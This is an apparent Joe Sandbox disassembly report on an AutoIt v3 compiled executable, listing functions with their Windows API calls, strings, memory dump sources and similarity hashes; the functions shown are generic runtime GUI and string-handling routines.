_memset.LIBCMT ref: 00DFB743
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00DFB78C
_memset.LIBCMT ref: 00DFB7EB
SendMessageW.USER32 ref: 00DFB815
SendMessageW.USER32(?,00001074,?,00000001), ref: 00DFB86D
SendMessageW.USER32(?,0000133D,?,?), ref: 00DFB91A
InvalidateRect.USER32(?,00000000,00000001), ref: 00DFB93C
GetMenuItemInfoW.USER32(?), ref: 00DFB986
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00DFB9B3
DrawMenuBar.USER32(?), ref: 00DFB9C2
SetWindowTextW.USER32(?,0000014E), ref: 00DFB9EA

Strings

0, xrefs: 00DFB95F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 396e0f32ff50d12ad91cc256fe137e182ad53f56b222a7dbc623f47fc0e361bc
Instruction ID: dd7038acd5ebead70edbc50bf86b8ce7d7babf1966a93dbfd97e127a30a7e396
Opcode Fuzzy Hash: 396e0f32ff50d12ad91cc256fe137e182ad53f56b222a7dbc623f47fc0e361bc
Instruction Fuzzy Hash: 1EE16A7590021CAEDF209F51CC84AFE7BB8EF05760F19C156FA69AA290DB748A44CF70

Function 00DF744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00DF7587
GetDesktopWindow.USER32 ref: 00DF759C
GetWindowRect.USER32(00000000), ref: 00DF75A3
GetWindowLongW.USER32(?,000000F0), ref: 00DF7605
DestroyWindow.USER32(?), ref: 00DF7631
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DF765A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DF7678
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00DF769E
SendMessageW.USER32(?,00000421,?,?), ref: 00DF76B3
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00DF76C6
IsWindowVisible.USER32(?), ref: 00DF76E6
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00DF7701
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00DF7715
GetWindowRect.USER32(?,?), ref: 00DF772D
MonitorFromPoint.USER32(?,?,00000002), ref: 00DF7753
GetMonitorInfoW.USER32 ref: 00DF776D
CopyRect.USER32(?,?), ref: 00DF7784
SendMessageW.USER32(?,00000412,00000000), ref: 00DF77EF

Strings

(, xrefs: 00DF7762
tooltips_class32, xrefs: 00DF7653
0, xrefs: 00DF7532

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 6dd398350e3421a3e4d1853cc5a975ec5987d77be1c8756840bab07b0f747db7
Instruction ID: 33f7e2d98452817b36b4fd60858015a038749a0a25501ca7edeb5695609d7773
Opcode Fuzzy Hash: 6dd398350e3421a3e4d1853cc5a975ec5987d77be1c8756840bab07b0f747db7
Instruction Fuzzy Hash: 47B19071608340AFDB04DF69C944BAABBE5FF88310F04891DF699AB291D770EC05CBA1

Function 00DAA756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DAA839
GetSystemMetrics.USER32(00000007), ref: 00DAA841
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DAA86C
GetSystemMetrics.USER32(00000008), ref: 00DAA874
GetSystemMetrics.USER32(00000004), ref: 00DAA899
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DAA8B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00DAA8C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DAA8F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DAA90D
GetClientRect.USER32(00000000,000000FF), ref: 00DAA92B
GetStockObject.GDI32(00000011), ref: 00DAA947
SendMessageW.USER32(00000000,00000030,00000000), ref: 00DAA952

Part of subcall function 00DAB736: GetCursorPos.USER32(000000FF), ref: 00DAB749
Part of subcall function 00DAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00DAB766
Part of subcall function 00DAB736: GetAsyncKeyState.USER32(00000001), ref: 00DAB78B
Part of subcall function 00DAB736: GetAsyncKeyState.USER32(00000002), ref: 00DAB799

SetTimer.USER32(00000000,00000000,00000028,00DAACEE), ref: 00DAA979

Strings

AutoIt v3 GUI, xrefs: 00DAA8F1

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 4f38599f36b4605b051cc3b4692216dff768e8fdfaa65c7a761db7526448e504
Instruction ID: 84a81b680bd35b1b20a86a2a055c1fd048d54f247202adf0b735f83d2039b290
Opcode Fuzzy Hash: 4f38599f36b4605b051cc3b4692216dff768e8fdfaa65c7a761db7526448e504
Instruction Fuzzy Hash: 68B16831A0020AEFDB18DFA9CC45BEE7BB5FB08315F158629FA15A7290DB74D841CB61

Function 00DF69C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00DF6A52
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00DF6B12

Strings

SELECTINVERT, xrefs: 00DF6BDA
GETITEMCOUNT, xrefs: 00DF6A80
GETTEXT, xrefs: 00DF6ABB
SELECTCLEAR, xrefs: 00DF6B89
SELECT, xrefs: 00DF6BA4
ISSELECTED, xrefs: 00DF6B1D
GETSELECTED, xrefs: 00DF6C38
SELECTALL, xrefs: 00DF6B71
FINDITEM, xrefs: 00DF6C7D
GETSUBITEMCOUNT, xrefs: 00DF6A9D
VIEWCHANGE, xrefs: 00DF6CC9
DESELECT, xrefs: 00DF6BF8
GETSELECTEDCOUNT, xrefs: 00DF6AF5

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: a3c35c493b89577fd1c45ced31359f2fe74b64d0f437e0ae40c41615acb891c7
Instruction ID: cac43393dd378e83ab0b84eb8845b2662ae2ab1e3ebd361abc3affb8fd72a1f9
Opcode Fuzzy Hash: a3c35c493b89577fd1c45ced31359f2fe74b64d0f437e0ae40c41615acb891c7
Instruction Fuzzy Hash: 2EA1BE702142059BCB08EF24C852B7AB7A1FF85354F198969F996AB7D2DB30EC05CB71

Function 00DCE69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00DCE6E1
_wcscmp.LIBCMT ref: 00DCE6F2
GetWindowTextW.USER32(00000001,?,00000400), ref: 00DCE71A
CharUpperBuffW.USER32(?,00000000), ref: 00DCE737
_wcscmp.LIBCMT ref: 00DCE755
_wcsstr.LIBCMT ref: 00DCE766
GetClassNameW.USER32(00000018,?,00000400), ref: 00DCE79E
_wcscmp.LIBCMT ref: 00DCE7AE
GetWindowTextW.USER32(00000002,?,00000400), ref: 00DCE7D5
GetClassNameW.USER32(00000018,?,00000400), ref: 00DCE81E
_wcscmp.LIBCMT ref: 00DCE82E
GetClassNameW.USER32(00000010,?,00000400), ref: 00DCE856
GetWindowRect.USER32(00000004,?), ref: 00DCE8BF

Strings

ThumbnailClass, xrefs: 00DCE7A9, 00DCE829
@, xrefs: 00DCE6BC

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 233f6a1b59dc61436bead55506b58f35346f3f82bc28dbfcf21016f266a991bc
Instruction ID: 57394556f2a96cfb41cacaeae3f8f0ec73c57280d40d7d214c98d117c3fb0c33
Opcode Fuzzy Hash: 233f6a1b59dc61436bead55506b58f35346f3f82bc28dbfcf21016f266a991bc
Instruction Fuzzy Hash: B9818DB10082069BDB15DF11C885FAA7BE8EF84714F18856EFD8A9B096DB30DD45CBB1

Function 00DCE4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00DCE549

Strings

[CLASS:, xrefs: 00DCE599
[HANDLE:, xrefs: 00DCE555
LAST, xrefs: 00DCE50E
[ALL, xrefs: 00DCE5EF
ALL, xrefs: 00DCE5DD
REGEXP=, xrefs: 00DCE55E
CLASSNAME=, xrefs: 00DCE586
HANDLE=, xrefs: 00DCE542
ACTIVE, xrefs: 00DCE524
[LAST, xrefs: 00DCE5F6
[REGEXPTITLE:, xrefs: 00DCE571
[ACTIVE, xrefs: 00DCE536

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: d8376f25c804196a90473cadfba47a39d8626f71c2e8985b3b9ab0865a6b7255
Instruction ID: e9e073c636af6c27eb3352fd7a52d601a405ccee6fb31b76829c9e2415803d79
Opcode Fuzzy Hash: d8376f25c804196a90473cadfba47a39d8626f71c2e8985b3b9ab0865a6b7255
Instruction Fuzzy Hash: B4316B71A54306E6DB15EB60ED93FAEB3A49F21704BA0052DF642720D6FF61AF048A71

Function 00DCF898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00DCF8AB
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DCF8BD
SetWindowTextW.USER32(?,?), ref: 00DCF8D4
GetDlgItem.USER32(?,000003EA), ref: 00DCF8E9
SetWindowTextW.USER32(00000000,?), ref: 00DCF8EF
GetDlgItem.USER32(?,000003E9), ref: 00DCF8FF
SetWindowTextW.USER32(00000000,?), ref: 00DCF905
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DCF926
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DCF940
GetWindowRect.USER32(?,?), ref: 00DCF949
SetWindowTextW.USER32(?,?), ref: 00DCF9B4
GetDesktopWindow.USER32 ref: 00DCF9BA
GetWindowRect.USER32(00000000), ref: 00DCF9C1
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00DCFA0D
GetClientRect.USER32(?,?), ref: 00DCFA1A
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00DCFA3F
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DCFA6A

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: fb85b3e2318043a9b4072d55ec04b6bdc0537ae3b65a2e894387f7203e456983
Instruction ID: 58cfd2eff971470d4da8af54df55f275e11c29577706437ed87ab76f8122f711
Opcode Fuzzy Hash: fb85b3e2318043a9b4072d55ec04b6bdc0537ae3b65a2e894387f7203e456983
Instruction Fuzzy Hash: 4C513D7090070AAFDB209FA9CD85FAEBBB6FF04704F00492DE596A35A0C774A944CF10

Function 00DE01E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00DE026A
_wcschr.LIBCMT ref: 00DE0278
_wcscpy.LIBCMT ref: 00DE028F
_wcscat.LIBCMT ref: 00DE029E
_wcscat.LIBCMT ref: 00DE02BC
_wcscpy.LIBCMT ref: 00DE02DD
__wsplitpath.LIBCMT ref: 00DE03BA
_wcscpy.LIBCMT ref: 00DE03DF
_wcscpy.LIBCMT ref: 00DE03F1
_wcscpy.LIBCMT ref: 00DE0406
_wcscat.LIBCMT ref: 00DE041B
_wcscat.LIBCMT ref: 00DE042D
_wcscat.LIBCMT ref: 00DE0442

Part of subcall function 00DDC890: _wcscmp.LIBCMT ref: 00DDC92A
Part of subcall function 00DDC890: __wsplitpath.LIBCMT ref: 00DDC96F
Part of subcall function 00DDC890: _wcscpy.LIBCMT ref: 00DDC982
Part of subcall function 00DDC890: _wcscat.LIBCMT ref: 00DDC995
Part of subcall function 00DDC890: __wsplitpath.LIBCMT ref: 00DDC9BA
Part of subcall function 00DDC890: _wcscat.LIBCMT ref: 00DDC9D0
Part of subcall function 00DDC890: _wcscat.LIBCMT ref: 00DDC9E3

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00DE0235

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 87d17a317896fbe4c23e89cf00272e56a955235ec49045b7944883fe3fcc4364
Instruction ID: 26c272fb10d36112cf5c88440957b0fccdcb88596c1b488925f92aa90b645634
Opcode Fuzzy Hash: 87d17a317896fbe4c23e89cf00272e56a955235ec49045b7944883fe3fcc4364
Instruction Fuzzy Hash: 8D91A071504341AFCF20EB60C955F9BB7E9EF88310F044859F5599B291EB74EA84CBB2

Function 00DFCC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DFCD0B
DestroyWindow.USER32(00000000,?), ref: 00DFCD83

Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DFCE04
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DFCE26
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DFCE35
DestroyWindow.USER32(?), ref: 00DFCE52
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D90000,00000000), ref: 00DFCE85
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DFCEA4
GetDesktopWindow.USER32 ref: 00DFCEB9
GetWindowRect.USER32(00000000), ref: 00DFCEC0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DFCED2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DFCEEA

Part of subcall function 00DAB155: GetWindowLongW.USER32(?,000000EB), ref: 00DAB166

Strings

0, xrefs: 00DFCD2B
tooltips_class32, xrefs: 00DFCDFD, 00DFCE7E

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 082b4a3a968408ad219091d752af0c11d7009809f97a089e3ce9393ee41f0582
Instruction ID: d3e7dde07cd9b8947d755bf7aeaea74aa8dd34680f8640a4f34177d82a056bce
Opcode Fuzzy Hash: 082b4a3a968408ad219091d752af0c11d7009809f97a089e3ce9393ee41f0582
Instruction Fuzzy Hash: 3571BB7115434DAFDB25CF28CC45FBA3BE5EB89704F488918FA85A72A1D770E815CB21

Function 00DDB428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00DDB46D
VariantCopy.OLEAUT32(?,?), ref: 00DDB476
VariantClear.OLEAUT32(?), ref: 00DDB482
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00DDB561
__swprintf.LIBCMT ref: 00DDB591
VarR8FromDec.OLEAUT32(?,?), ref: 00DDB5BD
VariantInit.OLEAUT32(?), ref: 00DDB63F
SysFreeString.OLEAUT32(00000016), ref: 00DDB6D1
VariantClear.OLEAUT32(?), ref: 00DDB727
VariantClear.OLEAUT32(?), ref: 00DDB736
VariantInit.OLEAUT32(00000000), ref: 00DDB772

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00DDB58B
Default, xrefs: 00DDB615

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: d19c8628644a2f194dd89a0c3c65258671017ad3430f440fec63a603cba616ab
Instruction ID: d380156ea27fe6908af6c1cd0e8066f6b499c1452f048a9c0bc83d4d606ace9d
Opcode Fuzzy Hash: d19c8628644a2f194dd89a0c3c65258671017ad3430f440fec63a603cba616ab
Instruction Fuzzy Hash: 91C1DE31A04615EBCF10DF65D894B6AB7B4FF05328F1A846BE455AB382DB30E844DBB0

Function 00DF6F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00DF6FF9
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DF7044

Strings

GETSELECTED, xrefs: 00DF713C
GETTOTALCOUNT, xrefs: 00DF7027
UNCHECK, xrefs: 00DF7208
GETITEMCOUNT, xrefs: 00DF710E
GETTEXT, xrefs: 00DF717F
EXPAND, xrefs: 00DF70DE
EXISTS, xrefs: 00DF70AD
COLLAPSE, xrefs: 00DF708A
ISCHECKED, xrefs: 00DF71AF
SELECT, xrefs: 00DF71DD
CHECK, xrefs: 00DF7064

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 509859a5140d22c80168672561fba9f5e5fd1966a94bd7bfa8720123ecffd984
Instruction ID: 869249bdc58e06f39d86da32507324f8c74a86ed8036bc6840d52498401a84db
Opcode Fuzzy Hash: 509859a5140d22c80168672561fba9f5e5fd1966a94bd7bfa8720123ecffd984
Instruction Fuzzy Hash: CB9196742087059FCB04EF24C851BA9B7A2EF95350F05886DF9956B392DB31ED0ACBB1

Function 00DFE305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DFE3BB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00DFBCBF), ref: 00DFE417
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DFE457
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DFE49C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DFE4D3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00DFBCBF), ref: 00DFE4DF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DFE4EF
DestroyCursor.USER32(?), ref: 00DFE4FE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DFE51B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DFE527

Part of subcall function 00DB1BC7: __wcsicmp_l.LIBCMT ref: 00DB1C50

Strings

.icl, xrefs: 00DFE331
